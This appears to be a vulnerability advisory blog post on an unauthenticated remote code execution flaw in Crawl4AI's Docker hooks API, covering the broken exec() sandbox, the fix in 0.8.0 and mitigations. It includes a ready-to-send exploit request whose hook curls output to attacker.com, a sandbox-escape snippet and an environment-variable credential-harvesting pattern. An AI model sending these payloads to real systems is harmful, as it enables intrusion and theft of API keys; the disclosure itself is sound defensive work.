Crawl4AI RCE: Hook, Line, and Sinker into Your Docker Container
Jan 17, 2026
Executive Summary (TL;DR)
Crawl4AI, a web scraper for LLMs, exposed an unauthenticated API endpoint that accepted custom Python code for 'hooks'. The developers attempted to sandbox this using `exec()` but accidentally allowed `__import__`. Attackers can send a JSON payload to the `/crawl` endpoint to execute system commands as root inside the Docker container, potentially stealing API keys or pivoting within the network. Fixed in version 0.8.0.
A critical Remote Code Execution (RCE) vulnerability in Crawl4AI's Docker deployment allows unauthenticated attackers to execute arbitrary Python code via the `hooks` parameter, bypassing a flimsy sandbox.
The Hook: Scrapers Need Logic, Hackers Need Shells
In the age of Large Language Models, feeding data to the beast is a full-time job. Enter Crawl4AI, a nifty tool designed to crawl the web and return clean, LLM-ready markdown. It's packaged neatly in a Docker container, making it easy for developers to spin up a scraping microservice. To make it flexible, the developers added a feature called Hooks.
Hooks are conceptually great. They allow users to inject custom logic at specific points in the scraping lifecycle—like when a page context is created (on_page_context_created). You might want to strip specific DOM elements or modify headers before the crawler does its job.
But here is the problem: providing "custom logic" usually means providing code. And when you allow unauthenticated users to send code to your server via a public API, you aren't just building a feature; you are building a remote shell with extra steps. The Crawl4AI Docker API exposed a /crawl endpoint that took this code and ran it. What could possibly go wrong?
The Flaw: The 'Sandbox' That Wasn't
The road to RCE is paved with good intentions and the Python exec() function. The developers knew that running user code was dangerous, so they tried to implement a sandbox. In Python, exec() accepts optional arguments to define the global and local scope, effectively limiting what the executed code can see.
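As a minimal illustration (not the project's actual code), passing a replacement `__builtins__` dict to `exec()` really does hide the normal built-ins from the executed code:

```python
# exec() takes an optional globals dict; replacing '__builtins__' there
# controls which built-in names the executed code can resolve.
scope = {'__builtins__': {'len': len}}

exec("n = len('abc')", scope)   # allowed: len is whitelisted
print(scope['n'])               # 3

try:
    exec("open('/etc/passwd')", scope)  # blocked: open is not whitelisted
except NameError as e:
    print("denied:", e)
```

This is why the approach looks plausible at first glance: unlisted built-ins genuinely raise `NameError`. The problem is which names end up on the list.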
The implementation attempted to restrict access by defining a whitelist of allowed_builtins. The idea was simple: if we only give them access to safe functions, they can't hurt us.
However, they made a fatal error in their whitelist. They included __import__.
> **Security Rule #1 of Python:** If you give an attacker access to `__import__`, you have given them the kingdom.
With __import__ available, the restrictions on other built-ins became irrelevant. An attacker doesn't need a pre-imported os module if they can just import it themselves dynamically. This is the equivalent of locking your front door (restricting scope) but leaving the window wide open with a neon sign pointing to it.
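Worse, `exec()`-based sandboxes are considered unsafe even *without* `__import__`, because executed code can still walk Python's object graph through dunder attributes. A classic sketch (illustrative, not specific to Crawl4AI):

```python
# Even with a completely empty __builtins__, executed code can reach
# every loaded class via the object graph -- the classic sandbox escape.
scope = {'__builtins__': {}}
exec("subs = ().__class__.__base__.__subclasses__()", scope)

# Hundreds of classes are reachable, many of which lead back to
# modules like os via their attributes.
print(len(scope['subs']) > 50)
```

In other words, the whitelist mistake made the attack trivial, but the underlying design was fragile regardless.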
The Code: Anatomy of a Bypass
Let's look at the logic that doomed the container. The vulnerable code in the hook manager looked something like this:
```python
# The flawed logic (simplified)
allowed_builtins = {
    'print': print,
    '__import__': __import__,  # <--- The fatal mistake
    # ... other "safe" functions
}

def execute_hook(code_string):
    # Executing user input with a "limited" scope
    exec(code_string, {'__builtins__': allowed_builtins})
```

Because `__import__` was explicitly passed into the scope, the attacker could simply write:

```python
__import__('os').system('id')
```

The fix in version 0.8.0 was twofold. First, they removed the dangerous builtin. Second, and more importantly, they recognized that secure defaults matter: they disabled hooks entirely by default.
```python
# The fix in v0.8.0 (simplified)

# 1. Hooks are disabled by default
if not os.getenv("CRAWL4AI_HOOKS_ENABLED"):
    raise SecurityError("Hooks are disabled.")

# 2. Hardened scope
allowed_builtins = {
    'print': print,
    # '__import__' is GONE.
}
```

The Exploit: JSON-Based Remote Code Execution
Exploiting this is trivially easy. You don't need complex memory corruption or race conditions. You just need a JSON payload and curl.
The attacker targets the /crawl endpoint. They construct a JSON body that defines a hook. Inside that hook, they place valid Python code. Since the server runs this code blindly, we can invoke the OS module to execute shell commands.
Here is a weaponized payload that forces the server to reach out to an attacker-controlled listener:
```http
POST /crawl HTTP/1.1
Host: target-crawl4ai:8000
Content-Type: application/json

{
  "urls": ["https://example.com"],
  "hooks": {
    "code": {
      "on_page_context_created": "async def hook(page, context, **kwargs):\n    # The Money Shot\n    import os\n    os.system('curl http://attacker.com/$(whoami)')\n    return page"
    }
  }
}
```

Wait, didn't we say `__import__`?
In a Python `exec()` context, if `__import__` is present in `__builtins__`, the `import` statement works too, because the statement desugars to a call to that builtin. And even if the keyword `import` had been blocked by a regex (it wasn't here), the attacker could call `__import__('os').system(...)` directly.
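A quick demonstration of that desugaring (a standalone sketch, not Crawl4AI code):

```python
# The `import` statement compiles to a lookup of __import__ in
# __builtins__, so whitelisting __import__ re-enables `import` too.
permissive = {'__builtins__': {'__import__': __import__}}
exec("import os\nuname = os.name", permissive)   # succeeds

strict = {'__builtins__': {}}
try:
    exec("import os", strict)                    # fails
except ImportError as e:
    print("import blocked:", e)
```

So the payload's plain `import os` and the explicit `__import__('os')` form are interchangeable here: whitelisting one enables both.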
Once sent, the Docker container executes the command as the running user. Since this is often root inside the container (unless specifically hardened), the attacker has full control over the environment.
The Impact: Secrets, Spiders, and Pivots
Why is this a CVSS 10.0?
- Complexity: Low. A script kiddie can write this exploit in 30 seconds.
- Privileges: None. No authentication required.
- Impact: Critical. Total compromise.
While the exploit runs inside a Docker container, that is rarely the end of the story. Crawl4AI is designed for LLM workflows, which means the environment variables likely contain:
- OpenAI / Anthropic API Keys: These are cash equivalents. Attackers steal them to resell access.
- Database Credentials: If the scraper saves data to a Postgres or Mongo instance, those credentials are now compromised.
- Internal Network Access: The container sits inside your network. An attacker can install `nmap` (or just use Python) to scan your internal VPC, pivoting from a lowly web scraper to your core infrastructure.
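To make the first bullet concrete, here is the kind of one-liner pattern defenders should expect inside a hostile hook; the name filter is illustrative, not taken from any observed payload:

```python
import os

# Illustrative credential-harvesting pattern a hostile hook might use:
# grab every environment variable whose name looks secret-bearing,
# then ship the result off-host (exfiltration step omitted).
SUSPECT = ("KEY", "TOKEN", "SECRET", "PASSWORD")

def harvest(env):
    return {k: v for k, v in env.items()
            if any(marker in k.upper() for marker in SUSPECT)}

loot = harvest({"OPENAI_API_KEY": "sk-...", "HOME": "/root"})
print(loot)  # only the API key survives the filter
```

One `os.environ` sweep like this turns a scraping container into a credential vending machine.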
This isn't just a bug; it's a free backstage pass to your infrastructure.
The Fix: Kill the Feature, Save the App
The mitigation is straightforward: Update to v0.8.0 immediately.
The maintainers correctly identified that "sandboxing is hard" and shifted the responsibility to the user.
- Default Deny: The Docker API now blocks hooks unless you explicitly set the environment variable `CRAWL4AI_HOOKS_ENABLED=true`.
- Scope Reduction: Even if enabled, the execution scope no longer includes `__import__`.
If you cannot update immediately, you must put this service behind a firewall or an authentication gateway (like Basic Auth via Nginx). Never expose the default Crawl4AI Docker port (usually 8000) to the public internet without an auth layer in front of it.
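For the interim firewall option, a reverse proxy with Basic Auth can be sketched as follows. This is a hypothetical nginx fragment: the hostname, htpasswd path, and upstream address are all assumptions for your environment.

```nginx
# Hypothetical nginx front-end adding Basic Auth to the Crawl4AI
# Docker API; adjust server_name, upstream, and htpasswd path.
server {
    listen 8443 ssl;
    server_name crawl.internal.example.com;

    location / {
        auth_basic           "Restricted";
        auth_basic_user_file /etc/nginx/.htpasswd;
        proxy_pass           http://127.0.0.1:8000;
    }
}
```

This doesn't fix the vulnerability; it only stops anonymous drive-by exploitation until you can upgrade.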
Technical Appendix
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`

Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Crawl4AI (Open Source) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE ID | CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network (API) |
| Authentication | None |
| Affected Component | Docker API / Hook Manager |
CWE-95 Definition

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. 'eval').